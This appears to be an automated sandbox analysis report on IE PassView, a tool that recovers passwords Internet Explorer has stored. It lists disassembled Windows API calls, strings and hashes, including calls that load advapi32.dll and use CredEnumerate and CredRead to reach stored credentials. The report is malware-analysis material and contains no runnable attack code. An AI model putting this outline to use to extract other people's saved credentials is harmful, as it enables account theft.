                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                        • API String ID: 2449869053-4258758744
                                        • Opcode ID: 06c9b524b776e8bba2dc149e1e975119917217e63118d0c7b498b9a8cd73550f
                                        • Instruction ID: 003e764b07dd5b06db3ac3cec127ba167f7bc96d71fea6526835b1c56324d332
                                        • Opcode Fuzzy Hash: 06c9b524b776e8bba2dc149e1e975119917217e63118d0c7b498b9a8cd73550f
                                        • Instruction Fuzzy Hash: 1A0104B06007009ADB706F7ADD49B07BAE0AB94700B208D3EE095B36D0D6BAA450DB99
                                        APIs
                                        • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A195
                                          • Part of subcall function 004053D7: LoadCursorA.USER32(00000000,00007F02), ref: 004053DE
                                          • Part of subcall function 004053D7: SetCursor.USER32(00000000), ref: 004053E5
                                        • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A1B8
                                          • Part of subcall function 0040A0CE: sprintf.MSVCRT ref: 0040A0F4
                                          • Part of subcall function 0040A0CE: sprintf.MSVCRT ref: 0040A11E
                                          • Part of subcall function 0040A0CE: _mbscat.MSVCRT ref: 0040A131
                                          • Part of subcall function 0040A0CE: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A157
                                        • SetCursor.USER32 ref: 0040A1DD
                                        • SetFocus.USER32(?), ref: 0040A1EF
                                        • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A206
                                        • memset.MSVCRT ref: 0040A21B
                                        • _mbscpy.MSVCRT(?,IE PassView,?,00000000,000003FF), ref: 0040A22D
                                        • sprintf.MSVCRT ref: 0040A254
                                        • SetWindowTextA.USER32(?,?), ref: 0040A269
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursorsprintf$FocusLoadTextWindow_mbscat_mbscpymemset
                                        • String ID: %s: %s$IE PassView
                                        • API String ID: 1200602740-2840194521
                                        • Opcode ID: f5094cf0edf700bc7def1687272bd8d92ce36bb861bbd2c298eabee37231295e
                                        • Instruction ID: 69b561ab783facfea62e5cba01b3acbb02d59bb2afa0ca916c4815844b62d3a1
                                        • Opcode Fuzzy Hash: f5094cf0edf700bc7def1687272bd8d92ce36bb861bbd2c298eabee37231295e
                                        • Instruction Fuzzy Hash: 45217F71500208AFD721AB65CC85FAA77EDFF48308F0504B9F619A72A2D6B4AD158F25
                                        APIs
                                        • _mbscpy.MSVCRT(004120F0,?), ref: 00407EC0
                                        • _mbscpy.MSVCRT(004121F8,general,004120F0,?), ref: 00407ED0
                                          • Part of subcall function 00407A83: memset.MSVCRT ref: 00407AA8
                                          • Part of subcall function 00407A83: GetPrivateProfileStringA.KERNEL32(004121F8,?,0040E470,?,00001000,004120F0), ref: 00407ACC
                                          • Part of subcall function 00407A83: WritePrivateProfileStringA.KERNEL32(004121F8,?,?,004120F0), ref: 00407AE3
                                        • EnumResourceNamesA.KERNEL32(?,00000004,Function_00007CD1,00000000), ref: 00407F06
                                        • EnumResourceNamesA.KERNEL32(?,00000005,Function_00007CD1,00000000), ref: 00407F10
                                        • _mbscpy.MSVCRT(004121F8,strings), ref: 00407F18
                                        • memset.MSVCRT ref: 00407F34
                                        • LoadStringA.USER32(?,00000000,?,00001000), ref: 00407F48
                                          • Part of subcall function 00407AF1: _itoa.MSVCRT ref: 00407B12
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                        • String ID: TranslatorName$TranslatorURL$general$strings
                                        • API String ID: 1035899707-3647959541
                                        • Opcode ID: 9582e2341051d6afeeacc9c98517bbee12d68174111ea14a9c12043bc1ce11b7
                                        • Instruction ID: 2cc56ae5bfb681f20954fdcfb62fedc6d740c0835c2d5c41f08e15392501c071
                                        • Opcode Fuzzy Hash: 9582e2341051d6afeeacc9c98517bbee12d68174111ea14a9c12043bc1ce11b7
                                        • Instruction Fuzzy Hash: 6E11E231E0425836D72167578C46FDF3E2CDB85754F00447AFA08B61C1D6B8A99096AD
                                        APIs
                                        • SetBkMode.GDI32(?,00000001), ref: 0040B49F
                                        • SetTextColor.GDI32(?,00FF0000), ref: 0040B4AD
                                        • SelectObject.GDI32(?,?), ref: 0040B4C2
                                        • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B4F6
                                        • SelectObject.GDI32(00000014,00000005), ref: 0040B502
                                          • Part of subcall function 0040B283: GetCursorPos.USER32(?), ref: 0040B290
                                          • Part of subcall function 0040B283: GetSubMenu.USER32(?,00000000), ref: 0040B29E
                                          • Part of subcall function 0040B283: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B2CC
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040B51D
                                        • LoadCursorA.USER32(00000000,00000067), ref: 0040B526
                                        • SetCursor.USER32(00000000), ref: 0040B52D
                                        • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040B54F
                                        • SetFocus.USER32(?), ref: 0040B58C
                                        • SetFocus.USER32(?), ref: 0040B603
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawHandleLoadMessageModeModulePopupPostTrack
                                        • String ID:
                                        • API String ID: 3230168590-0
                                        • Opcode ID: 4b215ba68ed7b2943b3bcb7948ba68023ff3924a7fe48d001ac839e9ebb3db4f
                                        • Instruction ID: 99d967e87b218d81e884191810209c469c196458d5d678120bee531a69c10094
                                        • Opcode Fuzzy Hash: 4b215ba68ed7b2943b3bcb7948ba68023ff3924a7fe48d001ac839e9ebb3db4f
                                        • Instruction Fuzzy Hash: F4518B71210205FFCB19AF65CC85AAA77A6FF08304F10057AF915BB2E1C7789D618B9E
                                        APIs
                                        • sprintf.MSVCRT ref: 00407CF2
                                        • LoadMenuA.USER32(?,?), ref: 00407D00
                                          • Part of subcall function 00407B29: GetMenuItemCount.USER32(?), ref: 00407B3E
                                          • Part of subcall function 00407B29: memset.MSVCRT ref: 00407B5F
                                          • Part of subcall function 00407B29: GetMenuItemInfoA.USER32 ref: 00407B9A
                                          • Part of subcall function 00407B29: strchr.MSVCRT ref: 00407BB1
                                        • DestroyMenu.USER32(00000000), ref: 00407D1E
                                        • sprintf.MSVCRT ref: 00407D62
                                        • CreateDialogParamA.USER32(?,00000000,00000000,00407CCC,00000000), ref: 00407D77
                                        • memset.MSVCRT ref: 00407D93
                                        • GetWindowTextA.USER32(00000000,?,00001000), ref: 00407DA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemsetsprintf$CountCreateDestroyDialogInfoLoadParamTextWindowstrchr
                                        • String ID: caption$dialog_%d$menu_%d
                                        • API String ID: 3071497004-3822380221
                                        • Opcode ID: 5a66b78d936a9636a50b2df3c6b14f3a71b0e6aad9caa070ae913f33758c7392
                                        • Instruction ID: 32cde7b292886ced11312a8859e5682abc8fd63b29569244e5c63d3dce261f88
                                        • Opcode Fuzzy Hash: 5a66b78d936a9636a50b2df3c6b14f3a71b0e6aad9caa070ae913f33758c7392
                                        • Instruction Fuzzy Hash: 7621F072908148BBDB12AF51DD82EEF3B28EF04305F10447AFA05B11D1D2B86DA48B6B
                                        APIs
                                        • strchr.MSVCRT ref: 0040C1A1
                                        • _mbscpy.MSVCRT(?,-00000001), ref: 0040C1AF
                                          • Part of subcall function 0040559B: strlen.MSVCRT ref: 004055AC
                                          • Part of subcall function 0040559B: strlen.MSVCRT ref: 004055B4
                                          • Part of subcall function 0040559B: _memicmp.MSVCRT ref: 004055CE
                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040C1FD
                                        • _mbscat.MSVCRT ref: 0040C208
                                        • memset.MSVCRT ref: 0040C1E4
                                          • Part of subcall function 00405990: GetWindowsDirectoryA.KERNEL32(00412498,00000104,?,0040C23D,00000000,?,00000000,00000104,00000104), ref: 004059A5
                                          • Part of subcall function 00405990: _mbscpy.MSVCRT(00000000,00412498,?,0040C23D,00000000,?,00000000,00000104,00000104), ref: 004059B5
                                        • memset.MSVCRT ref: 0040C22C
                                        • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040C247
                                        • _mbscat.MSVCRT ref: 0040C252
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                        • String ID: \systemroot
                                        • API String ID: 912701516-1821301763
                                        • Opcode ID: 28e342fe43c589a554c1bdb2e0c9192c7fa84f8ecc5dbd125d1132d364fc6ec5
                                        • Instruction ID: 31fdd45b3f5b781b88274249cf185fd0dc6b0352b0ceb64147351386182b16e6
                                        • Opcode Fuzzy Hash: 28e342fe43c589a554c1bdb2e0c9192c7fa84f8ecc5dbd125d1132d364fc6ec5
                                        • Instruction Fuzzy Hash: 9B21FC75D0C304B9E724A3E54CC6FEB629C8B15718F5001BFF588B10C2EABCA989462A
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00404C42
                                        • GetWindow.USER32(?,00000005), ref: 00404C5A
                                        • GetWindow.USER32(00000000), ref: 00404C5D
                                          • Part of subcall function 004015AB: GetWindowRect.USER32(?,?), ref: 004015BA
                                          • Part of subcall function 004015AB: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D5
                                        • GetWindow.USER32(00000000,00000002), ref: 00404C69
                                        • GetDlgItem.USER32(?,000003F3), ref: 00404C80
                                        • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00404C8D
                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00404C9B
                                        • FreeLibrary.KERNEL32(00000000), ref: 00404CAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Window$LibraryRect$AddressClientFreeItemLoadPointsProc
                                        • String ID: SHAutoComplete$shlwapi.dll
                                        • API String ID: 846015027-1506664499
                                        • Opcode ID: 36ec189a37b580cd799c7a60beba3737f9fbc182b0de0dcf69686658c0bb9726
                                        • Instruction ID: b61f9ae83d5cca416fac4a59b24ed0b9e7d361c88adb564d1af762a7c04d9879
                                        • Opcode Fuzzy Hash: 36ec189a37b580cd799c7a60beba3737f9fbc182b0de0dcf69686658c0bb9726
                                        • Instruction Fuzzy Hash: 2D01B5312002057FE6119B359D49FBA73ACEF85755F11083AF905B71D0DBB8DD015769
                                        APIs
                                          • Part of subcall function 00402978: LoadLibraryA.KERNEL32(advapi32.dll,?,00401F1F), ref: 00402985
                                          • Part of subcall function 00402978: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040299E
                                          • Part of subcall function 00402978: GetProcAddress.KERNEL32(?,CredFree), ref: 004029AA
                                          • Part of subcall function 00402978: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 004029B6
                                          • Part of subcall function 00402978: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 004029C2
                                          • Part of subcall function 00402978: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004029CE
                                        • wcslen.MSVCRT ref: 00406620
                                        • wcsncmp.MSVCRT ref: 00406660
                                        • memset.MSVCRT ref: 004066D5
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 004066F1
                                        • wcschr.MSVCRT ref: 0040673A
                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406760
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                        • String ID: J$Microsoft_WinInet$`$A
                                        • API String ID: 3318079752-302353289
                                        • Opcode ID: b3a9a8d235073bd91423286e9e58227929cd420a36e91ea677f96a6faedbe12a
                                        • Instruction ID: 13115e57eacac97305432b5338aa4cb26e2fe695d4be64bdc8d3037ecd813aa8
                                        • Opcode Fuzzy Hash: b3a9a8d235073bd91423286e9e58227929cd420a36e91ea677f96a6faedbe12a
                                        • Instruction Fuzzy Hash: F851F7B1D002199FDB20DFA5C9849DEBBB8FF08304F10447AE91AF7251E738AA558F55
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                        • String ID: 0$6
                                        • API String ID: 3540791495-3849865405
                                        • Opcode ID: 20bfde9252d4a6a922594ac7fd5134ffd5a44a80bc224ad0560f6bf294b11654
                                        • Instruction ID: ed4fa9e8ece2ba155e03ffd584b4ec770fb82937e298684def76ac4131db59b7
                                        • Opcode Fuzzy Hash: 20bfde9252d4a6a922594ac7fd5134ffd5a44a80bc224ad0560f6bf294b11654
                                        • Instruction Fuzzy Hash: A931A072808344AFD7109F91C84099BBBE9EB84354F14493FF598A2291D375E948CF5B
                                        APIs
                                          • Part of subcall function 00405759: GetFileAttributesA.KERNELBASE(?,00403409,?,?,?,?,00000000,00402C40,?), ref: 0040575D
                                        • _mbscpy.MSVCRT(004120F0,00000000,?,00000000,00407EA2,00000000,?,00000000,00000104), ref: 00407DFD
                                        • _mbscpy.MSVCRT(004121F8,general,004120F0,00000000,?,00000000,00407EA2,00000000,?,00000000,00000104), ref: 00407E0D
                                        • GetPrivateProfileIntA.KERNEL32(004121F8,rtl,00000000,004120F0), ref: 00407E1E
                                          • Part of subcall function 004079EF: GetPrivateProfileStringA.KERNEL32(004121F8,?,0040E470,00412248,?,004120F0), ref: 00407A0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: PrivateProfile_mbscpy$AttributesFileString
                                        • String ID: H"A$TranslatorName$TranslatorURL$charset$general$rtl
                                        • API String ID: 888011440-4106476969
                                        • Opcode ID: 20c7f670c4fbee4d165d537278dfbdf08a460d4d7532e0875e449b3bfd7cc637
                                        • Instruction ID: 66dd985f3f0e7778c3bccbbe20648230d46ea4180a27e3b7362807e5d014d099
                                        • Opcode Fuzzy Hash: 20c7f670c4fbee4d165d537278dfbdf08a460d4d7532e0875e449b3bfd7cc637
                                        • Instruction Fuzzy Hash: 58F0C231E8821232E22132279D03F6F35149B92B14F05887BB804BB2C2CAFC6830929E
                                        APIs
                                          • Part of subcall function 00405476: CreateFileA.KERNELBASE(00000003,80000000,00000001,00000000,00000003,00000000,00000000,00402A1C,9+@,00000001,00000000,?,00402B39), ref: 00405488
                                        • GetFileSize.KERNEL32(00000000,00000000,000000D0,?,00000000), ref: 00403AA2
                                        • memset.MSVCRT ref: 00403ACA
                                          • Part of subcall function 00405C7E: ReadFile.KERNEL32(00000000,00000000,00402A58,00000000,00000000,00000001,9+@,00402A58,00000000,00000000), ref: 00405C95
                                        • CloseHandle.KERNEL32(00000000), ref: 00403AE3
                                        • memset.MSVCRT ref: 00403B02
                                        • memcpy.MSVCRT(?,?,00000010,?,00000000,00000027), ref: 00403B14
                                          • Part of subcall function 0040387E: memcpy.MSVCRT(?,?,00000014,?,00000040,?,?,00000014,?,?,00000040,?,?,00000014,?,?), ref: 004038FF
                                          • Part of subcall function 0040387E: memcpy.MSVCRT(00403B3A,?,00000014,?,00000040,?,?,00000014,?,?,00000000,?,?,?,?,00403B3A), ref: 00403913
                                        • memset.MSVCRT ref: 00403B64
                                        • memset.MSVCRT ref: 00403B78
                                        • memcpy.MSVCRT(?,?,00000300,?,?,?,?,?,?), ref: 00403BA4
                                        • CloseHandle.KERNEL32(00000000), ref: 00403C38
                                        • GetLastError.KERNEL32(000000D0,?,00000000), ref: 00403C4D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memcpymemset$File$CloseHandle$CreateErrorLastReadSize
                                        • String ID:
                                        • API String ID: 3649111710-0
                                        • Opcode ID: 1cfd8bb843ecab2d6b68f0d864492ae9e3b97d52eccb6623384a9db00f67d67f
                                        • Instruction ID: 2c401ac52e737863d5db37530eab4728646a9ac02891eb25720bab3b67295176
                                        • Opcode Fuzzy Hash: 1cfd8bb843ecab2d6b68f0d864492ae9e3b97d52eccb6623384a9db00f67d67f
                                        • Instruction Fuzzy Hash: 3B5160B280011DAFDB11EFA4CC40EEE7BBDBB05305F0045BAE659B6181D7749B498BA5
                                        APIs
                                        • SendMessageA.USER32(?,00001003,00000001,?), ref: 00409B00
                                        • SendMessageA.USER32(?,00001003,00000000,?), ref: 00409B35
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00409B51
                                        • LoadImageA.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00409B64
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00409B70
                                        • LoadImageA.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00409B83
                                        • GetSysColor.USER32(0000000F), ref: 00409B97
                                        • DeleteObject.GDI32(?), ref: 00409BCB
                                        • DeleteObject.GDI32(00000000), ref: 00409BCE
                                        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 00409BEC
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObject$Color
                                        • String ID:
                                        • API String ID: 3376742181-0
                                        • Opcode ID: 67b3fc5b3893174d1452885769811962b82f4d2bc43bed66222c9b5c4566237a
                                        • Instruction ID: 8d2c33ce65e6e93bbc9177c73148a2639eedd03895a0f911b98c468d623f8299
                                        • Opcode Fuzzy Hash: 67b3fc5b3893174d1452885769811962b82f4d2bc43bed66222c9b5c4566237a
                                        • Instruction Fuzzy Hash: F5312F71680304BFF6315B719D5BFDBB7A9EB48B00F100829F3997A1D1CAF278509A29
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: free$strlen
                                        • String ID:
                                        • API String ID: 667451143-3916222277
                                        • Opcode ID: 25729e0cbf5ad53b8184dd575ad71ef6ef6561c60da3ae3b3689f997bb90a737
                                        • Instruction ID: eecc0934a3517d3ddcdb0937f2aecce29c8d7b695a5b4c66c4de19851d668ad5
                                        • Opcode Fuzzy Hash: 25729e0cbf5ad53b8184dd575ad71ef6ef6561c60da3ae3b3689f997bb90a737
                                        • Instruction Fuzzy Hash: 5D61573080C3459BDB249F25958446BBBF0FB85319F505D7FF4D6A22A1D739E84A8B0B
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040755F
                                        • _mbscpy.MSVCRT(004121F8,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040759D
                                          • Part of subcall function 004079B7: _itoa.MSVCRT ref: 004079D8
                                        • strlen.MSVCRT ref: 004075BB
                                        • GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 004075C9
